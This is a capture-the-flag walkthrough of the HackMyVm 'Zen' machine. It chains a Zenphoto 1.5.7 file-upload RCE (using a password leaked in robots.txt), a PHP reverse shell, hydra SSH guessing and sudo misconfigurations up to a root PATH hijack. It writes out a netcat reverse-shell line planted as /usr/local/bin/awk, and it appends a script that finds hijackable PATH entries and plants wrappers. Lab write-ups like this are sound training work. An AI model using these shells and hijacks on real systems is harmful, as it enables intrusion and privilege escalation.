HackMyVm Zen Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Zen
Scan all ports.
```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
| 256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
|_ 256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
80/tcp open http nginx 1.14.2
| http-robots.txt: 9 disallowed entries
| /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
|_/zp-data/ /page/search/ /uploaded/ /backup/
|_http-server-header: nginx/1.14.2
|_http-title: Galería
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
The main page's HTML comment gives the application name and version.
```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->
```
Searching for Zenphoto 1.5.7 turns up a known authenticated arbitrary file upload: an admin can enable the elFinder uploader plugin and drop a .php file into the web root, which is remote code execution for anyone holding admin credentials.
Authenticated arbitrary file upload to RCE
Product : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote
Log in, then go to Plugins, then Uploader, and tick the elFinder checkbox;
press Apply. After that go to Upload, then Files (elFinder), and drag and drop
any malicious PHP file. Then browse to /uploaded/ and your PHP code is there.
Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.
robots.txt contains a strange entry, P@ssw0rd, which looks like a password rather than a path.
The Zenphoto login panel is at /zp-core/admin.php; admin:P@ssw0rd works.
Upload a PHP reverse shell through elFinder, start a listener, then request the uploaded file (here /backup/r.php) to trigger it.
```bash
& kali @ mykali in ~/Documents/zen 0 [13:57:14]
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38120.
Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
20:23:18 up 16 min, 0 users, load average: 0.00, 0.02, 0.04
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
────────────────────────────────────────────────────────────────────────────────────────────────────────
& kali @ mykali in ~/Documents/zen 0 [14:05:51]
~ curl http://192.168.56.99/backup/r.php
```
There are three users in /home.
```bash
www-data@zen:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 Jun 14 03:45 .
drwxr-xr-x 18 root root 4096 Jun 14 03:19 ..
drwxr-xr-x 2 hua hua 4096 Jun 14 03:45 hua
drwxr-xr-x 2 kodo kodo 4096 Jun 14 03:24 kodo
drwxr-xr-x 3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster
```
Nothing reachable from www-data leads to any of these three users, so the remaining option is to guess SSH credentials. With the usernames as both login and password list, hydra's `-e nsr` also tries an empty password, the login itself and the reversed login.
```bash
~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F ...
[DATA] attacking ssh://192.168.56.99:22/
[22][ssh] host: 192.168.56.99 login: zenmaster password: zenmaster
```
Log in as zenmaster over SSH. sudo lets zenmaster run /bin/bash as kodo without a password, so escalating to kodo is one command.
```bash
zenmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p
```
As kodo, check sudo -l again: kodo may run /usr/bin/see as hua. `see` is run-mailcap, and `--action=edit` hands the file to the mailcap edit handler, which for a text file is an editor. Create a world-writable scratch file, open it as hua, and spawn a shell from the editor (in vi: `:!/bin/bash`) to become hua.
```bash
kodo@zen:/home/zenmaster$ sudo -l
Matching Defaults entries for kodo on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kodo may run the following commands on zen:
(hua) NOPASSWD: /usr/bin/see
kodo@zen:/home/zenmaster$ touch /tmp/tmp.txt
kodo@zen:/home/zenmaster$ chmod 666 /tmp/tmp.txt
kodo@zen:/home/zenmaster$ sudo -u hua /usr/bin/see --action=edit /tmp/tmp.txt
hua@zen:/home/zenmaster$ id
uid=1002(hua) gid=1002(hua) groups=1002(hua)
```
As hua, check sudo -l.
```bash
hua@zen:/tmp$ sudo -l
Matching Defaults entries for hua on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User hua may run the following commands on zen:
(ALL : ALL) NOPASSWD: /usr/sbin/add-shell zen
```
hua can write to /usr/local/bin, which sits near the front of the secure_path that sudo sets for the add-shell command.
```bash
hua@zen:/tmp$ find / -writable -not -path '/proc*' 2>/dev/null
...
/tmp/.X11-unix
/usr/local/bin
/usr/lib/systemd/system/mountnfs-bootclean.service
...
```
add-shell is a shell script that calls awk, cat and rm by bare name, so the shell resolves them through PATH. strace shows the lookup probing /usr/local/bin first (the stat calls), and none of the three exists there, so a file of that name in the writable directory is what gets executed.
```bash
hua@zen:/tmp$ strace /usr/sbin/add-shell zen 2>&1 |grep /usr/local/bin
stat("/usr/local/bin/awk", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/cat", 0x7fff52bfdc20) = -1 ENOENT (No such file or directory)
stat("/usr/local/bin/rm", 0x7fff52bfdb80) = -1 ENOENT (No such file or directory)
hua@zen:/tmp$ ls -la /usr/local/bin/awk
ls: cannot access '/usr/local/bin/awk': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/cat
ls: cannot access '/usr/local/bin/cat': No such file or directory
hua@zen:/tmp$ ls -la /usr/local/bin/rm
ls: cannot access '/usr/local/bin/rm': No such file or directory
```
Write a reverse shell into /usr/local/bin/awk, make it executable, and run add-shell through sudo; root's shell finds our awk first and the listener gets a root shell. The planted file has no shebang, which works here only because bash runs an ENOEXEC file as a script; a `#!/bin/sh` line makes it independent of which shell executes add-shell.
```bash
hua@zen:/tmp$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /usr/local/bin/awk
hua@zen:/tmp$ chmod +x /usr/local/bin/awk
hua@zen:/tmp$ sudo /usr/sbin/add-shell zen
────────────────────────────────────────────────────────────────────────────────────────────────────────
& kali @ mykali in ~ 0 [15:25:33]
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38124.
id;hostname
uid=0(root) gid=0(root) groups=0(root)
zen
```
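The root step is a PATH hijack: sudo replaces PATH with secure_path, /usr/local/bin is early in that list and writable by hua, and add-shell calls awk, cat and rm by bare name. The script below is an added example, not code from the walkthrough or from the add-shell package. It turns the strace observation into a reusable check: given a PATH string and command names, it reports every name whose lookup reaches a directory we can write to before any directory holding the real binary, and it plants a wrapper (with a shebang) at the reported location. The directory layout it runs against is constructed under mktemp to stand in for secure_path on zen; no real system paths are touched, and the function and file names are the example's own.

```shell
#!/bin/sh
# Added example (not from the walkthrough): detect and exploit a PATH hijack of the
# kind that roots zen. A command called by bare name from a script run under sudo is
# resolved through secure_path, so the first directory in that list that is writable
# and does not already contain the real binary is where our file will be executed.

# path_hijack_check PATH NAME...
#   Walk PATH in order for each NAME and print DIR/NAME for the first writable
#   directory reached before any directory that holds a real executable NAME.
#   Exit status 0 if at least one hijackable name was found, 1 otherwise.
path_hijack_check() {
    pth=$1; shift
    status=1
    for name in "$@"; do
        old_ifs=$IFS
        IFS=:
        for dir in $pth; do
            IFS=$old_ifs
            [ -n "$dir" ] || dir=.      # an empty PATH entry means the current directory
            # a real executable here ends the lookup before anything we control is reached
            if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
                break
            fi
            if [ -w "$dir" ]; then
                printf '%s/%s\n' "$dir" "$name"
                status=0
                break
            fi
        done
        IFS=$old_ifs
    done
    return $status
}

# plant_wrapper TARGET COMMAND
#   Write an executable wrapper script at TARGET that runs COMMAND. Unlike the bare
#   "nc ..." line in the walkthrough, the shebang makes this work regardless of which
#   shell interprets add-shell (bash's ENOEXEC fallback is not relied on).
plant_wrapper() {
    printf '#!/bin/sh\n%s\n' "$2" > "$1" && chmod 755 "$1"
}

# demo: a constructed layout standing in for secure_path on zen. local/bin is writable
# like /usr/local/bin; bin holds a real cat like /bin. Nothing outside mktemp is touched.
demo() {
    t=$(mktemp -d)
    mkdir -p "$t/local/bin" "$t/bin"
    printf '#!/bin/sh\necho real cat\n' > "$t/bin/cat"
    chmod 755 "$t/bin/cat"
    fake_path="$t/local/bin:$t/bin"
    echo "hijackable names for add-shell under $fake_path:"
    path_hijack_check "$fake_path" awk cat rm
    # plant a wrapper at the first hit and resolve awk the way add-shell's shell would
    plant_wrapper "$t/local/bin/awk" 'echo "awk hijacked, running as uid $(id -u)"'
    env PATH="$fake_path" awk
    rm -rf "$t"
}
demo
```

On the real box the call would be `path_hijack_check "$(sudo -l | sed -n 's/.*secure_path=//p' | tr -d '\\')" awk cat rm`; whatever it prints is the file to plant before running `sudo /usr/sbin/add-shell zen`. Note that cat is reported as hijackable too: a genuine /bin/cat further down the list does not protect against a writable directory ahead of it.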